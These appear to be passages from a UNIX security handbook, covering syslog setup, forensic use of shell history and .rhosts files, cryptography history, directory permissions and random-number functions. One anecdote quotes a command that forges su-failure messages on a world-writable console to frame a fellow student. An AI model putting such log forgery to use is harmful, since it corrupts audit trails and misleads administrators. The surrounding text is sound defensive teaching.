This feature can cause a lot of network traffic, so you may instead wish to limit your log to only "important" messages. For example, the following configuration sends the hardware and security-related messages to the remote logging hosts, but keeps some copies on the local host for debugging purposes:

*.err;kern.debug;auth.notice     /dev/console
daemon,auth.notice               /var/adm/messages
lpr.*                            @loghost1,@loghost2
auth.*                           @loghost1,@loghost2
*.emerg                          @loghost1,@loghost2
*.alert                          @loghost1,@loghost2
mark.*                           /dev/console

Logging to another host adds to your overall system security: even if people break into one computer and erase its log files, they will still have to deal with the log messages sent across the network to the other system. If you do log to a remote host, you might wish to restrict user accounts on that machine. However, be careful: if you only log over the network to a single host, then that one host is a single point of failure. The above example logs to both loghost1 and loghost2.

Another alternative is to use a non-UNIX machine as the log host. The syslog code can be compiled on other machines with standard C and TCP/IP libraries. Thus, you can log to a DOS or Macintosh machine, and further protect your logs. After all, if syslog is the only network service running on those systems, there is no way for someone to break in from the net to alter the logs!

10.5.2.3 Logging everything everywhere

Disks are cheap these days. Sites with sufficient resources and adequately trained personnel sometimes choose to log everything that might possibly be useful, and to log it in many different places. For example, clients can create their own log files of syslog events, and also send all logging messages to several different logging hosts - possibly on different networks.

The advantage of logging in multiple places is that it makes an attacker's attempts at erasing any evidence of his presence much more difficult. On the other hand, multiple log files will not do you any good if they are never examined. Furthermore, if they are never pruned, they may grow so large that they will shut down your computers.

10.5.3 syslog Messages

The following tables[11] summarize some typical messages available on various versions of UNIX:

[11] A similar list is not available for System V UNIX, because syslog is part of the Berkeley UNIX offering. Companies that sell syslog with their System V offerings may or may not have modified the additional programs in their operating systems to allow them to use the syslog logging facility.

Table 10.4: Typical Critical Messages

Program   Message                                                     Meaning
halt      halted by <user>                                            <user> used the /etc/halt command to shut down the system.
login     ROOT LOGIN REFUSED ON <tty> [FROM <hostname>]               root tried to log onto a terminal that is not secure.
login     REPEATED LOGIN FAILURES ON <tty> [FROM <hostname>], <user>  Somebody tried to log in as <user> and supplied a bad password more than five times.
reboot    rebooted by <user>                                          <user> rebooted the system with the /etc/reboot command.
su        BAD SU <user> on <tty>                                      Somebody tried to su to the superuser and did not supply the correct password.
shutdown  reboot, halt, or shutdown by <user> on <tty>                <user> used the /etc/shutdown command to reboot, halt, or shut down the system.

Other critical conditions might include messages about full filesystems, device failures, or network problems.

Table 10.5: Typical Info Messages

Program   Message                                                     Meaning
date      date set by <user>                                          <user> changed the system date.
login     ROOT LOGIN <tty> [FROM <hostname>]                          root logged in.
su        <user> on <tty>                                             <user> used the su command to become the superuser.
getty     <tty>                                                       /bin/getty was unable to open <tty>.

NOTE: For security reasons, some information should never be logged. For example, although you should log failed password attempts, you should not log the password that was used in the failed attempt. Users frequently mistype their own passwords, and logging these mistyped passwords would help a computer cracker break into a user's account. Some system administrators believe that the account name should also not be logged on failed login attempts - especially when the account typed by the user is nonexistent. The reason is that users occasionally type their passwords when they are prompted for their usernames. If invalid accounts are logged, it might be possible for an attacker to use those logs to infer people's passwords.

You may want to insert syslog calls into your own programs to record information of importance. Third-party software also often has the capability to send log messages to syslog if configured correctly. For example, Xyplex terminal servers and Cisco routers can both log information to a network syslog daemon; Usenet news and POP mail servers also log information.

If you are writing shell scripts, you can also log to syslog. Systems with syslog usually come with the logger command. To log a warning message about a user trying to execute a shell file with invalid parameters, you might include:

logger -t ThisProg -p user.notice "Called without required # of parameters"

NOTE: Prior to 1995, many versions of the syslog library call did not properly check their inputs to be certain that the data would fit into the function's internal buffers. Thus, many programs could be coerced into writing arbitrary data over their stacks, leading to potential compromise. Be certain that the software you run uses a version of syslog that does not have this vulnerability.

10.5.3.1 Beware false log entries

The UNIX syslog facility allows any user to create log entries. This capability opens up the possibility for false data to be entered into your logs. An interesting story of such logging was given to us by Alec Muffet:

A friend of mine - a UNIX sysadmin - enrolled as a mature student at a local polytechnic in order to secure the degree which had been eluding him for the past four years.


One of the other students on his Computer Science course was an obnoxious geek user who was shoulder surfing people and generally making a nuisance of himself, and so my friend determined to take revenge.

The site was running an early version of Ultrix on an 11/750, but the local operations staff were somewhat paranoid about security, and had removed world execute from "su" and left it group-executable by those in the wheel group, or similar; in short, only the sysadmin staff should have had execute access for su.

Hence, the operations staff were somewhat worried to see messages like the following scrolling up the console:

BAD SU: geekuser ON ttyp4 AT 11:05:20
BAD SU: geekuser ON ttyp4 AT 11:05:24
BAD SU: geekuser ON ttyp4 AT 11:05:29
BAD SU: geekuser ON ttyp4 AT 11:05:36
...

When the console eventually displayed:

SU: geekuser ON ttyp4 AT 11:06:10

all hell broke loose: the operations staff panicked at the thought of an undergrad running around the system as root and pulled the plug (!) on the machine. The system administrator came into the terminal room, grabbed the geekuser, took him away and shouted at him for half an hour, asking (a) why was he hacking, (b) how was he managing to execute su, and (c) how had he guessed the root password?

Nobody had noticed my friend in the corner of the room, quietly running a script which periodically issued the following command, redirected into /dev/console, which was world-writable:

echo BAD SU: geekuser ON ttyp4 AT `date`

The moral, of course, is that you shouldn't panic, and that you should treat your audit trail with suspicion.



Chapter 6
Cryptography

Contents:
A Brief History of Cryptography
What Is Encryption?
The Enigma Encryption System
Common Cryptographic Algorithms
Message Digests and Digital Signatures
Encryption Programs Available for UNIX
Encryption and U.S. Law

Cryptography is the science and art of secret writing - keeping information secret.[1] When applied in a computing environment, cryptography can protect data against unauthorized disclosure; it can authenticate the identity of a user or program requesting service; and it can disclose unauthorized tampering. In this chapter, we'll survey some of those uses and present a brief summary of the encryption methods that are often available on UNIX systems.

[1] Cryptanalysis is the related study of breaking ciphers. Cryptology is the combined study of cryptography and cryptanalysis.

Cryptography is an indispensable part of modern computer security.

6.1 A Brief History of Cryptography

Knowledge of cryptography can be traced back to ancient times. It's not difficult to understand why: as soon as three people had mastered the art of reading and writing, there was the possibility that two of them would want to send letters to each other that the third could not read.

In ancient Greece, the Spartan generals used a form of cryptography so that they could exchange secret messages: the messages were written on narrow ribbons of parchment that were wound spirally around a cylindrical staff called a scytale. After the ribbon was unwound, the writing on it could be read only by a person who had a matching cylinder of exactly the same size. This primitive system did a reasonably good job of protecting messages from interception and from the prying eyes of the message courier as well.

In modern times, cryptography's main role has been in securing electronic communications. Soon after Samuel F. B. Morse publicly demonstrated the telegraph in 1845, users of the telegraph began worrying about the confidentiality of the messages that were being transmitted. What would happen if somebody tapped the telegraph line? What would prevent unscrupulous telegraph operators from keeping a copy of the messages that they relayed and then divulging them to others? The answer was to encode the messages with a secret code, so that nobody but the intended recipient could decrypt them.

Cryptography became even more important with the invention of radio, and its use in war. Without cryptography, messages transmitted to or from the front lines could easily be intercepted by the enemy.

6.1.1 Code Making and Code Breaking

As long as there have been code makers, there have been code breakers. Indeed, the two have been locked in competition for centuries, with each advance on one side being matched by a counter-advance on the other.

For people who use codes, the code-breaking efforts of cryptanalysts pose a danger that is potentially greater than the danger of not using cryptography in the first place. Without cryptography, you might be reluctant to send sensitive information through the mail, across a telex, or by radio. But if you think that you have a secure channel of communication, then you might use it to transmit secrets that should not be widely revealed.

For this reason, cryptographers and organizations that use cryptography routinely conduct their own code-breaking efforts to make sure that their codes are resistant to attack. The findings of these self-inflicted intrusions are not always pleasant. The following brief story from a 1943 book on cryptography demonstrates this point quite nicely:

[T]he importance of the part played by cryptographers in military operations was<br />

demonstrated to us realistically in the First World War. One instructive incident occurred in<br />

September 1918, on the eve of the great offensive against Saint-Mihiel. A student<br />

cryptographer, fresh from Washington, arrived at United States Headquarters at the front.<br />

Promptly he threw the General Staff into a state of alarm by decrypting with comparative<br />

ease a secret radio message intercepted in the American sector.<br />

The smashing of the German salient at Saint-Mihiel was one of the most gigantic tasks<br />

undertaken by the American forces during the war. For years that salient had stabbed into<br />

the Allied lines, cutting important railways and communication lines. Its lines of defense<br />

were thought to be virtually impregnable. But for several months the Americans had been<br />

making secret preparations for attacking it and wiping it out. The state was set, the minutest<br />

details of strategy had been determined - when the young officer of the United States<br />

Military Intelligence spread consternation through our General Staff.<br />

The dismay at Headquarters was not caused by any new information about the strength of<br />

the enemy forces, but by the realization that the Germans must know as much about our<br />

secret plans as we did ourselves - even the exact hour set for the attack. The `intercepted'<br />

message had been from our own base. German cryptographers were as expert as any in the<br />

world, and what had been done by an American student cryptographer could surely have<br />

been done by German specialists.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch06_01.htm (2 of 4) [2002-04-12 10:45:31]


[Chapter 6] Cryptography<br />

The revelation was even more bitter because the cipher the young officer had broken,<br />

without any knowledge of the system, was considered absolutely safe and had long been<br />

used for most important and secret communications.[2]<br />

[2] Smith, Laurence Dwight. Cryptography: The Science of <strong>Sec</strong>ret Writing.<br />

Dover Publications, New York, 1941.<br />

6.1.2 Cryptography and Digital Computers

Modern digital computers are, in some senses, the creations of cryptography. Some of the first digital computers were built by the Allies to break messages that had been encrypted by the Germans with electromechanical encrypting machines. Code breaking is usually a much harder problem than code making; after the Germans switched codes, the Allies often took several months to discover the new coding systems. Nevertheless, the codes were broken, and many historians say that World War II was shortened by at least a year as a result.

Things really picked up when computers were turned to the task of code making. Before computers, all of cryptography was limited to two basic techniques: transposition, or rearranging the order of letters in a message (such as the Spartans' scytale), and substitution, or replacing one letter with another one. The most sophisticated pre-computer cipher used five or six transposition or substitution operations, but rarely more.
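To make the idea of substitution concrete, here is a quick sketch of our own (not one of the chapter's examples): a Caesar-style substitution cipher, with every letter shifted three places, built from the standard tr command. Some older System V versions of tr may want the ranges written as '[A-Z]'.

% echo "ATTACK AT DAWN" | tr 'A-Z' 'D-ZA-C'
DWWDFN DW GDZQ
% echo "DWWDFN DW GDZQ" | tr 'D-ZA-C' 'A-Z'
ATTACK AT DAWN

A cipher this simple falls to frequency analysis in minutes, which is exactly why pre-computer systems layered several substitution and transposition steps on top of one another.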

With the coming of computers, ciphers could be built from dozens, hundreds, or thousands of complex operations, and yet could still encrypt and decrypt messages in a short amount of time. Computers have also opened up the possibility of using complex algebraic operations to encrypt messages. All of these advantages have had a profound impact on cryptography.

6.1.3 Modern Controversy

In recent years, encryption has gone from being an arcane science and the stuff of James Bond movies, to being the subject of debate in several nations (but we'll focus on the case in the U.S. in the next few paragraphs). In the U.S. that debate is playing itself out on the front pages of newspapers such as The New York Times and the San Jose Mercury News.

On one side of the debate are a large number of computer professionals, civil libertarians, and perhaps a majority of the American public, who are rightly concerned about their privacy and the secrecy of their communications. These people want the right and the ability to protect their data with the most powerful encryption systems possible.

On the other side of the debate are the United States Government, members of the nation's law enforcement and intelligence communities, and (apparently) a small number of computer professionals, who argue that the use of cryptography should be limited because it can be used to hide illegal activities from authorized wiretaps and electronic searches.

MIT Professor Ronald Rivest has observed that the controversy over cryptography fundamentally boils down to one question:

    Should the citizens of a country have the right to create and store documents which their government cannot read?[3]

[3] Rivest, Ronald, speaking before the MIT Telecommunications Forum, Spring 1994.

This chapter does not address this question. Nor do we attempt to explore the U.S. Government's[4] claimed need to eavesdrop on communications, the fear that civil rights activists have of governmental abuse, or other encryption policy issues. Although those are interesting and important questions - questions you should also be concerned with as a computer user - they are beyond the scope of this book.

Instead, we focus on discussion of the types of encryption that are available to most UNIX users today and those that are likely to be available in the near future. If you are interested in the broader questions of who should have access to encryption, we suggest that you pursue some of the references listed in Appendix D, Paper Sources, starting with Building in Big Brother, edited by Professor Lance Hoffman.

[4] Or any other government!

A Note About Key Escrow

There has been considerable debate recently centering on the notion of key escrow. The usual context is during debate over the ability of private citizens to have access to strong cryptography. Many government officials and prominent scientists advocate a form of escrowed encryption as a good compromise between law enforcement needs and privacy concerns. In such schemes, a copy of the decryption key for each user is escrowed by one or more trusted parties, and is available if a warrant is issued for it.

Whatever your feelings are on the matter of law enforcement access to your decryption keys, consider escrowing your keys! By this, we do not mean making your keys available to the government. Rather, we mean placing a copy of your keys in a secure location where they can be retrieved if you or someone else needs them. You may pick a key so strong that you forget it a year from now. Or, you might develop amnesia, get food poisoning from a bad Twinkie, or get kidnapped by aliens to keep Elvis company. If any of these calamities befall you, how are your coworkers or family going to decrypt the vital records that you have encrypted?

We recommend that you deposit copies of your encryption keys and passwords in safe locations, such as a safe or safety deposit box. If you are uncomfortable about leaving the keys all in one place, there are algorithms with which you can split a key into several parts and deposit a part with each of several trusted parties. With key-splitting schemes, one or two parts by themselves are not enough to recreate the key, but a majority of them is enough to recover the key. Consult a good book on cryptography for details.

But do escrow your own keys!
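As a minimal sketch of self-escrow (the file and device names are only examples - adjust them for the software and media you actually use), a PGP user might copy the secret keyring to a floppy, label it, and lock the disk in the office safe:

% tar cf /dev/fd0 ~/.pgp/secring.pgp

Splitting a key so that any majority of the parts can reconstruct it requires a threshold scheme such as Shamir's secret sharing; that is a job for a dedicated tool rather than the shell, so we leave it to the cryptography references in Appendix D.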



[Chapter 10] 10.4 Per-User Trails in the Filesystem

Chapter 10
Auditing and Logging

10.4 Per-User Trails in the Filesystem

Although not obvious, there are some files that are kept on a per-user basis that can be helpful in analyzing when something untoward has happened on your system. While not real log files, as such, they can be treated as a possible source of information on user behavior.

10.4.1 Shell History

Many of the standard user command shells, including csh, tcsh, and ksh, can keep a history file. When the user issues commands, the text of each command and its arguments are stored into the history file for later re-execution. If you are trying to recreate activity performed on an account, possibly by some intruder, the contents of this file can be quite helpful when coupled with system log information. You must check the modification time on the file to be sure that it was in use during the time the suspicious activity occurred. If it was created and modified during the intruder's activities, you should be able to determine the commands run, the programs compiled, and sometimes even the names of remote accounts or machines that might also be involved in the incident. Be sure of your target, however, because this is potentially a violation of privacy for the real user of this account.

Obviously, an aware intruder will delete the file before logging out. Thus, this mechanism may be of limited utility. However, there are two ways to increase your opportunity to get a useful file. The first way is to force the logout of the suspected intruder, perhaps by using a signal or shutting down the system. If a history file is being kept, this will leave the file on disk where it can be read. The second way to increase your chances of getting a usable file is to make a hard link to the existing history file, and to locate the link in a directory on the same disk that is normally inaccessible to the user (e.g., in a root-owned directory). Even if the intruder unlinks the file from the user's directory, it can still be accessed through the extra link.

Also note that this technique can come in handy if you suspect that an account is being used inappropriately. You can alter the system profile to create and keep a history file, if none was kept before. On some systems, you can even designate a named pipe (FIFO) as the history file, thus transmitting the material to a logging process in a manner that cannot be truncated or deleted.
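For example, the hard-link trick might look like the following sketch (the account name and the evidence directory are placeholders; the link must live on the same filesystem as the user's home directory, and the history file is ~/.history for csh and tcsh, or whatever HISTFILE names for ksh):

# mkdir /var/adm/.evidence
# chmod 700 /var/adm/.evidence
# ln /home/suspect/.history /var/adm/.evidence/suspect.history

Because the hard link is simply another name for the same inode, an rm of ~/.history by the intruder removes only the name in the home directory; the data remains reachable through the copy of the name in /var/adm/.evidence.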

Even if you were unable to preserve a copy of the history file - provided one was created and then unlinked by the intruder - you can still gain some useful information if you act quickly enough. The first thing you must do is to either take the system to single-user mode, or umount the disk with the suspect account (we recommend going to single-user mode). Then, you can use disk-examination tools to look at the records on the free list. When a file is deleted, the contents are not immediately overwritten. Instead, the data blocks are added back onto the free list on disk. If they are not reused yet (which is why you umount the disk or shut the system down), you can still read the contents.

10.4.2 Mail

Some user accounts are configured to make a copy of all outgoing mail in a file. If an intruder sends mail from a user account where this feature is set (or where you set it), the saved copies can provide you with potentially useful information. In at least one case we know of, a person stealing confidential information by using a coworker's pirated password was exposed because of recorded email to his colleagues that he signed with his own name!
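The details vary from mailer to mailer; with the Berkeley Mail/mailx family, for instance, a single line in the user's .mailrc (the path shown is only an example) tells the program to append every outgoing message to a file:

set record=~/mail/outbound

Other mail programs have equivalent options; check the documentation for the mailer your site actually uses.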

Some systems also record a log file of mail sent and received. This file can be kept per-user, or it may be part of the system-wide syslog audit trail. The contents of this log can be used to track what mail has come into and left the system. If nothing else, we have found this information to be useful when a disk error (or human error) wipes out a whole set of mailboxes - the people listed in the mail log file can be contacted to resend their mail.

10.4.3 Network Setup

Each user account can have several network configuration files that can be edited to provide shortcuts for commands, or to assert access rights. Sometimes, the information in these files will provide a clue as to the activities of a malefactor. Examples include the .rhosts file for remote logins, and the .netrc file for FTP. Examine these files carefully for clues, but remember: the information in one of these files may have been there prior to the incident, or it may have been planted to throw you off.
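A quick way to gather these files for review (the /home path and account name are only examples - use wherever your home directories actually live):

# find /home \( -name .rhosts -o -name .netrc \) -print
# ls -lu /home/suspect/.rhosts
# cat /home/suspect/.rhosts

The -u flag to ls displays the last access time, which can help establish whether the file was consulted during the period you are investigating.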



[Chapter 11] 11.2 Damage

Chapter 11
Protecting Against Programmed Threats

11.2 Damage

The damage that programmed threats do ranges from the merely annoying to the catastrophic - for example, the complete destruction of all data on a system by a low-level disk format. The damage may be caused by selective erasures of particular files, or minute data changes that swap random digits or zero out selected values. Many threats may seek specific targets - their authors may wish to damage a particular user's files, destroy a particular application, or completely initialize a certain database to hide evidence of some other activity.

Disclosure of information is another type of damage that may result from programmed threats. Rather than simply altering information on disk or in memory, a threat can make some information readable, send it out as mail, post it on a bulletin board, or print it on a printer. This information could include sensitive material, such as system passwords or employee data records, or something as damaging as trade secret software. Programmed threats may also allow unauthorized access to the system, and may result in installing unauthorized accounts, changing passwords, or circumventing normal controls. The type of damage done varies with the motives of the people who write the malicious code.

Malicious code can cause indirect damage, too. If your firm ships software that inadvertently contains a virus or logic bomb, there are several forms of potential damage to consider. Certainly, your corporate reputation will suffer. Your company could also be held accountable for customer losses; licenses and warranty disclaimers used with software might not protect against damage suits in such a situation.

You cannot know with certainty that any losses (of either kind - direct or indirect) will be covered by business insurance. If your company does not have a well-defined security policy and your employees fail to exercise precautions in the preparation and distribution of software, your insurance may not cover subsequent losses. Ask your insurance company about any restrictions on their coverage of such incidents.



[Chapter 1] 1.2 What Is an Operating System?

Chapter 1
Introduction

1.2 What Is an Operating System?

For most people, a computer is a tool for solving problems. When running a word processor, a computer becomes a machine for arranging words and ideas. With a spreadsheet, the computer is a financial planning machine, one that is vastly more powerful than a pocket calculator. Connected to an electronic network, a computer becomes part of a powerful communications system.

At the heart of every computer is a master set of programs called the operating system. This is the software that controls the computer's input/output systems such as keyboards and disk drives, and that loads and runs other programs. The operating system is also a set of mechanisms and policies that help define controlled sharing of system resources.

Along with the operating system is a large set of standard utility programs for performing common functions such as copying files and listing the contents of directories. Although these programs are not technically part of the operating system, they can have a dramatic impact on a computer system's security.

All of UNIX can be divided into three parts:

●   The kernel, or the heart of the UNIX system, is the operating system. The kernel is a special program that is loaded into the computer when it is first turned on. The kernel controls all of the computer's input and output systems; it allows multiple programs to run at the same time, and it allocates the system's time and memory among them. The kernel includes the filesystem, which controls how files and directories are stored on the computer's hard disk. The filesystem is the main mechanism by which computer security is enforced. Some modern versions of UNIX allow user programs to load additional modules, such as device drivers, into the kernel after the system starts running.

●   Standard utility programs are run by users and by the system. Some programs are small and serve a single function - for example, /bin/ls lists files and /bin/cp copies them. Other programs are large and perform many functions - for example, /bin/sh and /bin/csh, UNIX shells that process user commands, are themselves programming languages.

●   System database files, most of which are relatively small, are used by a variety of programs on the system. One file, /etc/passwd, contains the master list of every user on the system. Another file, /etc/group, describes groups of users with similar access rights.
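For instance, a single line in each of these database files describes one user and one group. The entries below are invented for illustration, and the exact fields (especially the password field) differ from system to system:

% grep rachel /etc/passwd
rachel:Pge3vxIF2Q8dY:181:100:Rachel Cohen:/u/rachel:/bin/csh
% grep users /etc/group
users:*:100:rachel,arlin

The fields are separated by colons; the chapters on users, groups, and passwords discuss these files, and the ways attackers abuse them, in more detail.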

From the point of view of UNIX security, these three parts interact with a fourth entity:

●   Security policy, which determines how the computer is run with respect to the users and system administration. Policy plays as important a role in determining your computer's security as the operating system software. A computer that is operated without regard to security cannot be trusted, even if it is equipped with the most sophisticated and security-conscious software. For this reason, establishing and codifying policy plays a very important role in the overall process of operating a secure system. This is discussed further in Chapter 2.



[Chapter 19] 19.7 Other Network Authentication Systems

Chapter 19
RPC, NIS, NIS+, and Kerberos

19.7 Other Network Authentication Systems

Besides Sun's Secure RPC and Kerberos, there are a variety of other systems for providing authentication and encryption services over an unprotected network.

19.7.1 DCE

DCE is the Distributed Computing Environment developed by the Open Software Foundation. DCE is an integrated computing environment that provides many services, including user authentication, remote procedure call, distributed file sharing, and configuration management. DCE's authentication is very similar to Kerberos, and its file sharing is very similar to the Andrew File System.

DCE's security is based on a Security Server. The Security Server maintains an access control list for various operations and decides whether clients have the right to request operations.

DCE clients communicate with DCE servers using DCE Authenticated RPC. To use Authenticated RPC, each DCE principal (user or service) must have a secret key that is known only to itself and the Security Server.

A complete description of DCE can be found at http://www.osf.org/dce

19.7.2 SESAME

SESAME is the Secure European System for Applications in a Multi-vendor Environment. It is a single sign-on authentication system similar to Kerberos.

SESAME incorporates many features of Kerberos 5, but adds heterogeneity, access control features, scalability of public key systems, improved manageability, and an audit system.

The primary difference between SESAME and Kerberos is that SESAME uses public key cryptography (which is not covered by patent in Europe), allowing it to avoid some of the operational difficulties that Kerberos experiences. SESAME is funded in part by the Commission of the European Union's RACE program.

A complete description of SESAME can be found at the following Web address:

http://www.esat.kuleuven.ac.be/cosic/sesame3.html



[Chapter 16] 16.4 Other Network Protocols

Chapter 16
TCP/IP Networks

16.4 Other Network Protocols

There are several other network protocols that may be involved in a network environment. We'll mention them here, but we won't go into detail about them as they are not as common in UNIX environments as IP networks are. If you are curious about these other network protocols, we suggest that you consult a good book on networks and protocols; several are listed in Appendix D. Several of these protocols can share the same physical network as an IP-based network, thus allowing more economical use of existing facilities, but they also make traffic more available to eavesdroppers and saboteurs.

16.4.1 IPX

Novell NetWare networks use a proprietary protocol known as the Internetwork Packet eXchange protocol (IPX). It does not scale well to large networks such as the Internet, although RFC1234 describes a system for connecting IPX networks together using IP networks and a technique known as tunneling.

IPX is commonly found in PC-based networks. Some UNIX vendors support IPX-based services and connections with their products.

16.4.2 SNA

The Systems Network Architecture (SNA) is an old protocol used by IBM to link mainframes together. It is seldom found elsewhere. These days, IBM machines are in the process of transitioning to IP or IPX. We expect that SNA will be extinct before too long.

16.4.3 DECnet

The DECnet protocol was developed at Digital Equipment Corporation to link together machines, and is based on Digital's proprietary operating systems. DECnet provides many of the same basic functions as IP, including mail, virtual terminals, file sharing, and network time. During its heyday, many third parties also built peripherals to support DECnet. Many large DECnet networks have been built, but the trend within Digital has been to migrate to open standards such as IP.


16.4.4 OSI

The Open Systems Interconnection (OSI) protocols, developed by the International Standards Organization (ISO), are an incredibly complex and complete set of protocols for every kind of network implementation. OSI was developed after TCP/IP, and supports many of the same kinds of services.

OSI is a classic example of what happens when a committee is asked to develop a complex specification without the benefit of first developing working code. Although many organizations have stated that they intend to switch from IP to OSI standards, this has not happened except for a few high-level services, such as X.500 directory service and cryptographic certificates. On matters such as data transmission, the OSI standards have in general proven to be too cumbersome and complex to fully implement efficiently.

We are clearly not big fans of OSI, but if you are interested in pursuing all the gory details, an excellent book on the topic (which will give you a fairer treatment of OSI than we do here) is The Open Book: A Practical Perspective on OSI by Marshall T. Rose (Prentice Hall, 1990).

16.4.5 XNS

The Xerox Network Systems (XNS) protocol family was developed by Xerox. These were supported by a few other computer manufacturers, but few people use them now. Development inside Xerox has largely switched over to IP as well.



[Chapter 5] 5.4 Using Directory Permissions

Chapter 5
The UNIX Filesystem

5.4 Using Directory Permissions

Unlike many other operating systems, UNIX stores the contents of directories in ordinary files. These files are similar to other files, but they are specially marked so that they can only be modified by the operating system.

As with other files, directories have a full complement of security attributes: owner, group, and permission bits. But because directories are interpreted in a special way by the filesystem, the permission bits have special meanings (see Table 5.11).

Table 5.11: Permissions for Directories

Contents  Permission  Meaning
r         read        You can use the opendir() and readdir() functions (or the ls
                      command) to find out which files are in the directory.
w         write       You can add, rename, or remove entries in that directory.
x         execute     You can stat the contents of a directory (e.g., you can determine
                      the owners and the lengths of the files in the directory). You
                      also need execute access to a directory to make that directory
                      your current directory or to open files inside the directory
                      (or in any of the directory's subdirectories).

If you want to prevent other users from reading the contents of your files, you have two choices (both are shown in the example below):

1.  You can set the permission of each file to 0600, so only you have read/write access.

2.  You can put the files in a directory and set the permission of that directory to 0700, which prevents other users from accessing the files in the directory (or in any of the directory's subdirectories) unless there is a link to the file from somewhere else.
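A minimal illustration of the two approaches (the file and directory names are only examples):

% chmod 600 notes.txt
% mkdir private
% mv notes.txt private
% chmod 700 private

The first command protects a single file; the remaining three gather files into a directory that only the owner can enter.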

Note the following:

●   You must have execute access for a directory to make it your current directory (via cd or chdir) or to change to any directory beneath (contained in) that directory.

●   If you do not have execute access to a directory, you cannot access the files within that directory, even if you own them.

●   If you have execute access to a directory but do not have read access, you cannot list the names of files in the directory (e.g., you cannot read the contents of the directory). However, if you have access to individual files, you can run programs in the directory or open files in it. Some sites use this technique to create secret files - files that users can access only if they know the files' names.

●   To unlink a file from a directory, you need only have write and execute access to that directory even if you have no access rights to the file itself.

●   If you have read access to a directory but do not have execute access, you will be able to display a short listing of the files in the directory (ls); however, you will not be able to find out anything about the files other than their names and inode numbers (ls -i) because you can't stat the files. Remember that the directory itself only contains name and inode information.

This processing can cause quite a bit of confusion if you are not expecting it. For example:

% ls -ldF conv
dr--------   4 rachel       1024 Jul  6 09:42 conv/
% ls conv
3ps.prn         bizcard.ps      letterhead.eps  retlab.eps
% ls -l conv
conv/3ps.prn not found
conv/retlab.eps not found
conv/letterhead.eps not found
conv/bizcard.ps not found
total 0
%

Removing Funny Files

One of the most commonly asked questions by new UNIX users is "How do I delete a file whose name begins with a dash? If I type rm -foo, the rm command treats the filename as an option." There are two simple ways to delete such a file. The first is to use a relative pathname:

% rm ./-foo
%

A second way is to supply an empty option argument, although this does not work under every version of UNIX:

% rm - -foo
%

If you have a file that has control characters in its name, you can use the rm command with the -i option and an asterisk, which gives you the option of removing each file in the directory - even the ones that you can't type.

% rm -i *
rm: remove faq.html (y/n)? n
rm: remove foo (y/n)? y
%

A great way to discover files with control characters in them is to use the -q option to the UNIX ls command. You can, for example, alias the ls command to be ls -q. Files that have control characters in their filenames will then appear with question marks:

% alias ls ls -q
% ls f*
faq.html          fmMacros            fmdictionary      fo?o
faxmenu.sea.hqx   fmMacrosLog.backup  fmfilesvisited
%

Table 5.12 contains some common directory permissions and their uses.

Table 5.12: Common Directory Permissions

Octal Number  Directory  Permission
0755          /          Anybody can view the contents of the directory, but only the
                         owner or superuser can make changes.
1777          /tmp       Any user can create a file in the directory, but a user cannot
                         delete another user's files.
0700          $HOME      A user can access the contents of his home directory, but
                         nobody else can.



[Chapter 1] 1.5 Role of This Book

Chapter 1
Introduction

1.5 Role of This Book

If we can't change UNIX and the environment in which it runs, the next best thing is to learn about how to protect the system as best we can. That's the goal of this book. If we can provide information to users and administrators in a way that helps them understand the way things work and how to use the safeguards, then we should be moving in the right direction. After all, these areas seem to be where many of the problems originate.

Unfortunately, knowing how things work on the system is not enough. Because of the UNIX design, a single flaw in a UNIX system program can compromise the security of the operating system as a whole. This is why vigilance and attention are needed to keep a system running securely: after a hole is discovered, it must be fixed. Furthermore, in this age of networked computing, that fix must be made widely available, lest some users who have not updated their software fall victim to more up-to-date attackers.

NOTE: Although this book includes numerous examples of past security holes in the UNIX operating system, we have intentionally not provided the reader with an exhaustive list of the means by which a machine can be penetrated. Not only would such information not necessarily help to improve the security of your system, but it might place a number of systems running older versions of UNIX at additional risk.

Even properly configured UNIX systems are still very susceptible to denial of service attacks, where one user can make the system unusable for everyone else by "hogging" a resource or degrading system performance. In most circumstances, however, administrators can track down the person who is causing the interruption of service and deal with that person directly. We'll talk about denial of service attacks in Chapter 25, Denial of Service Attacks and Solutions.

First of all, we start by discussing basic issues of policy and risk in Chapter 2. Before you start setting permissions and changing passwords, make sure you understand what you are protecting and why. You should also understand what you are protecting against. Although we can't tell you all of that, we can outline some of the questions you need to answer before you design your overall security plan.

Throughout the rest of the book, we'll be explaining UNIX structures and mechanisms that can affect your overall security. We concentrate on the fundamentals of the way the system behaves so you can understand the basic principles and apply them in your own environment. We have specifically not presented examples and suggestions of where changes in the source code can fix problems or add security. Although we know of many such fixes, most UNIX sites do not have access to source code. Most system administrators do not have the necessary expertise to make the required changes. Furthermore, source code changes over time, as do configurations. A fix that is appropriate in March 1996 may not be desirable on a version of the operating system shipped the following September. Instead, we present principles, with the hope that they will give you better long-term results than one-time custom modifications.

We suggest that you keep in mind that even if you take everything to heart that we explain in the following chapters, and even if you keep a vigilant watch over your systems, you may still not fully protect your assets. You need to educate every one of your users about good security and convince them to practice what they learn. Computer security is a lonely, frustrating occupation if it is practiced as a case of "us" (information security personnel) versus "them" (the rest of the users). If you can practice security as "all of us" (everyone in the organization) versus "them" (people who would breach our security), the process will be much easier. You also need to help convince vendors to produce safer code. If we all put our money behind our stated concerns, maybe the vendors will finally catch on.



[Chapter 23] 23.7 UNIX Pseudo-Random Functions

Chapter 23
Writing Secure SUID and Network Programs

23.7 UNIX Pseudo-Random Functions

The standard UNIX C library provides two random number generators: rand() and random(). A third random number generator, drand48(), is available on some versions of UNIX. Although you won't want to use any of these routines to produce cryptographic random numbers, we'll briefly explain each. Then, if you need to use one of them for something else, you'll know something about its strengths and shortcomings.

23.7.1 rand()

The original UNIX random number generator, rand(), is not a very good random number generator. It uses a 32-bit seed and maintains a 32-bit internal state. The output of the function is also 32 bits in length, making it a simple matter to determine the function's internal state by examining the output. As a result, rand() is not very random. Furthermore, the low-order bits of some implementations are not random at all, but flip back and forth between 0 and 1 according to a regular pattern. The rand() random number generator is seeded with the function srand(). On some versions of UNIX, a third function is provided, rand_r(), for multithreaded applications. (The function rand() itself is not safe for multithreading, as it maintains internal state.)

Do not use rand(), even for simple statistical purposes.

23.7.2 random()

The function random() is a more sophisticated random number generator which uses nonlinear feedback and an internal table that is 124 bytes (992 bits) long. The function returns random values that are 32 bits in length. All of the bits generated by random() are usable.

The random() function is adequate for simulations and games, but should not be used for security-related applications such as picking cryptographic keys or simulating one-time pads.

23.7.3 drand48(), lrand48(), and mrand48()

